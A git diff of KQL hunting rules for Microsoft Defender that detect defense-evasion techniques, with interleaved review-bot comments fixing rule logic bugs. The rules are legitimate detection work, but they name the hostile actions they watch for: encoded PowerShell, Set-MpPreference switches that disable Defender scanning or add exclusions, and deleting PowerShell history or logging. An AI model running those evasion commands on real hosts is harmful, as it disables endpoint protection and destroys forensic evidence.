 | where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId "))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql b/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql
index f545b0d6..b21d0472 100644
--- a/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql
+++ b/KQL/rules/Defense Evasion/powershell_base64_encoded_frombase64string_cmdlet.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell Base64 Encoded FromBase64String Cmdlet
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-08-24
-// Level: high
-// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1140, attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: PowerShell Base64 Encoded FromBase64String Cmdlet
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-08-24
+// Level: high
+// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw")
\ No newline at end of file
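Review bot: The three IPv6 exclusions inside the `not(...)` block of the `| where` line — `ipv4_is_in_range(RemoteIP, "::1/128")`, `ipv4_is_in_range(RemoteIP, "fe80::/10")` and `ipv4_is_in_range(RemoteIP, "fc00::/7")` — can never match, because `ipv4_is_in_range` parses IPv4 only and returns null for any other input. Worse, whenever `RemoteIP` is an IPv6 address every range check in that block returns null, so the whole predicate very likely evaluates to null and the row is dropped by `where`, which leaves IPv6 connections from wuauclt unmonitored instead of merely un-excluded. Use `ipv6_is_in_range(RemoteIP, "::1/128")`, `ipv6_is_in_range(RemoteIP, "fe80::/10")` and `ipv6_is_in_range(RemoteIP, "fc00::/7")` for those three entries; since `ipv6_is_in_range` also accepts IPv4 input, the IPv4 entries could be converted the same way to make the block null-safe for both families.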
diff --git a/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql b/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql
index 564d3923..a61d64da 100644
--- a/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql
+++ b/KQL/rules/Defense Evasion/powershell_base64_encoded_mppreference_cmdlet.kql
@@ -1,10 +1,10 @@ -// Title: Powershell Base64 Encoded MpPreference Cmdlet -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-04 -// Level: high -// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceProcessEvents +// Title: Powershell Base64 Encoded MpPreference Cmdlet +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-04 +// Level: high +// Description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "QWRkLU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "BZGQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "U2V0LU1wUHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1NcFByZWZlcmVuY2Ug" or ProcessCommandLine contains "TZXQtTXBQcmVmZXJlbmNlI" or ProcessCommandLine contains "YWRkLW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "FkZC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "hZGQtbXBwcmVmZXJlbmNlI" or ProcessCommandLine contains "c2V0LW1wcHJlZmVyZW5jZS" or ProcessCommandLine contains "NldC1tcHByZWZlcmVuY2Ug" or ProcessCommandLine contains "zZXQtbXBwcmVmZXJlbmNlI") or (ProcessCommandLine contains "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains 
"YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA" or ProcessCommandLine contains "cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA" or ProcessCommandLine contains "MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA" or ProcessCommandLine contains "zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql b/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql index 77b323a6..7af11faa 100644 --- a/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql +++ b/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Console History Logs Deleted -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-15 -// Level: medium -// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 - -DeviceFileEvents +// Title: PowerShell Console History Logs Deleted +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: medium +// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 + +DeviceFileEvents | where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql b/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql index 7fdd5b39..75f7bca4 100644 --- a/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql 
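Review bot: The `| where` line of powershell_console_history_logs_deleted.kql filters only on `FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt"` and never on `ActionType`, so every write PSReadLine makes to the history file — i.e. each interactive PowerShell session — produces a hit, although the title and description promise to detect deletion. Add the action filter, `| where ActionType == "FileDeleted" and FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt"`. The prefetch_file_deleted.kql hunk further down (the `DeviceFileEvents` query on `":\\Windows\\Prefetch\\"` / `".pf"`) has the same omission and is noisier still, since the OS rewrites .pf files continuously during normal operation.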
+++ b/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Core DLL Loaded Via Office Application -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-01 -// Level: medium -// Description: Detects PowerShell core DLL being loaded by an Office Product -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceImageLoadEvents +// Title: PowerShell Core DLL Loaded Via Office Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-01 +// Level: medium +// Description: Detects PowerShell core DLL being loaded by an Office Product +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceImageLoadEvents | where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql b/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql index ed0c9d81..6254118c 100644 --- a/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql +++ b/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql 
@@ -1,13 +1,13 @@ -// Title: Powershell Defender Disable Scan Feature -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-03 -// Level: high -// Description: Detects requests to disable Microsoft Defender features using PowerShell commands -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Possible administrative activity -// - Other Cmdlets that may use the same parameters - -DeviceProcessEvents +// Title: Powershell Defender Disable Scan Feature +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-03 +// Level: high +// Description: Detects requests to disable Microsoft Defender features using PowerShell commands +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Possible administrative activity +// - Other Cmdlets that may use the same parameters + +DeviceProcessEvents | where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains 
"QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains 
"RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains 
"kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql b/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql index 19f19cf2..4dd05231 100644 --- a/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql +++ b/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql 
@@ -1,13 +1,13 @@
-// Title: Powershell Defender Exclusion
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-04-29
-// Level: medium
-// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Possible Admin Activity
-// - Other Cmdlets that may use the same parameters
-
-DeviceProcessEvents
+// Title: Powershell Defender Exclusion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-04-29
+// Level: medium
+// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Possible Admin Activity
+// - Other Cmdlets that may use the same parameters
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
index 4d40e3d9..191d79af 100644
--- a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
+++ b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
@@ -1,14 +1,14 @@
-// Title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
-// Author: Matt Anderson (Huntress)
-// Date: 2025-07-11
-// Level: high
-// Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
-// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
-// An attacker might use this technique via the command line to bypass defenses before executing payloads.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Highly unlikely
-
-DeviceProcessEvents
+// Title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: high
+// Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
+// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
+// An attacker might use this technique via the command line to bypass defenses before executing payloads.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Highly unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-LowThreatDefaultAction" or ProcessCommandLine contains "-ModerateThreatDefaultAction" or ProcessCommandLine contains "-HighThreatDefaultAction" or ProcessCommandLine contains "-SevereThreatDefaultAction" or ProcessCommandLine contains "-ltdefac " or ProcessCommandLine contains "-mtdefac " or ProcessCommandLine contains "-htdefac " or ProcessCommandLine contains "-stdefac ") and ProcessCommandLine contains "Set-MpPreference" and (ProcessCommandLine contains "Allow" or ProcessCommandLine contains "6" or ProcessCommandLine contains "NoAction" or ProcessCommandLine contains "9")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql
index 1f195db4..aae7fe6a 100644
--- a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql
+++ b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql
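Review bot: The final group on the `| where` line, `(ProcessCommandLine contains "Allow" or ProcessCommandLine contains "6" or ProcessCommandLine contains "NoAction" or ProcessCommandLine contains "9")`, is almost always true: a single `6` or `9` anywhere in the command line (a path, a GUID, a timestamp) satisfies it, so it adds no selectivity and the rule effectively fires on every `Set-MpPreference` invocation that names a `*ThreatDefaultAction` parameter, at level `high`. Tie the value to the parameter instead, e.g. `ProcessCommandLine matches regex @"(?i)(ThreatDefaultAction|[lmhs]tdefac)[\s:]+(6|9|Allow|NoAction)\b"`, which keeps the documented values `6`/`9`/`Allow`/`NoAction` but only when they follow one of the parameters the rule is about.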
@@ -1,11 +1,11 @@
-// Title: Powershell Executed From Headless ConHost Process
-// Author: Matt Anderson (Huntress)
-// Date: 2024-07-23
-// Level: medium
-// Description: Detects the use of powershell commands from headless ConHost window.
-// The "--headless" flag hides the windows from the user upon execution.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003
-
-DeviceProcessEvents
+// Title: Powershell Executed From Headless ConHost Process
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the use of powershell commands from headless ConHost window.
+// The "--headless" flag hides the windows from the user upon execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "--headless" and ProcessCommandLine contains "powershell") and (FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql b/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql
index f3709ea0..950e05a4 100644
--- a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql
+++ b/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell Logging Disabled Via Registry Key Tampering
-// Author: frack113
-// Date: 2022-04-02
-// Level: high
-// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.001
-
-DeviceRegistryEvents
+// Title: PowerShell Logging Disabled Via Registry Key Tampering
+// Author: frack113
+// Date: 2022-04-02
+// Level: high
+// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\PowerShell*" or RegistryKey endswith "\\Microsoft\\PowerShellCore*") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql b/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql
index 1f796e48..d2600bfa 100644
--- a/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql
+++ b/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql
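Review bot: `RegistryKey endswith "\\Microsoft\\Windows\\PowerShell*"` and `RegistryKey endswith "\\Microsoft\\PowerShellCore*"` on the `| where` line carry a literal `*` left over from the Sigma wildcard; KQL `endswith` does no globbing, and even without the `*` an `endswith` on the parent path can never be true at the same time as the `endswith "...\\EnableModuleLogging"` group it is AND-ed with, so the rule can never fire. Replace the group with `(RegistryKey contains "\\Microsoft\\Windows\\PowerShell\\" or RegistryKey contains "\\Microsoft\\PowerShellCore\\")`. Separately, `RegistryValueData =~ "DWORD (0x00000000)"` looks like the Sysmon rendering of the value; in DeviceRegistryEvents the DWORD data is, as far as I know, exposed as the plain number (`"0"`), so this comparison should be confirmed against live telemetry before the rule is relied on.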
@@ -1,10 +1,10 @@
-// Title: PowerShell Script Change Permission Via Set-Acl
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-18
-// Level: high
-// Description: Detects PowerShell execution to set the ACL of a file or a folder
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: PowerShell Script Change Permission Via Set-Acl
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects PowerShell execution to set the ACL of a file or a folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql b/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql
index 653acae6..350ecce2 100644
--- a/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql
+++ b/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell Set-Acl On Windows Folder
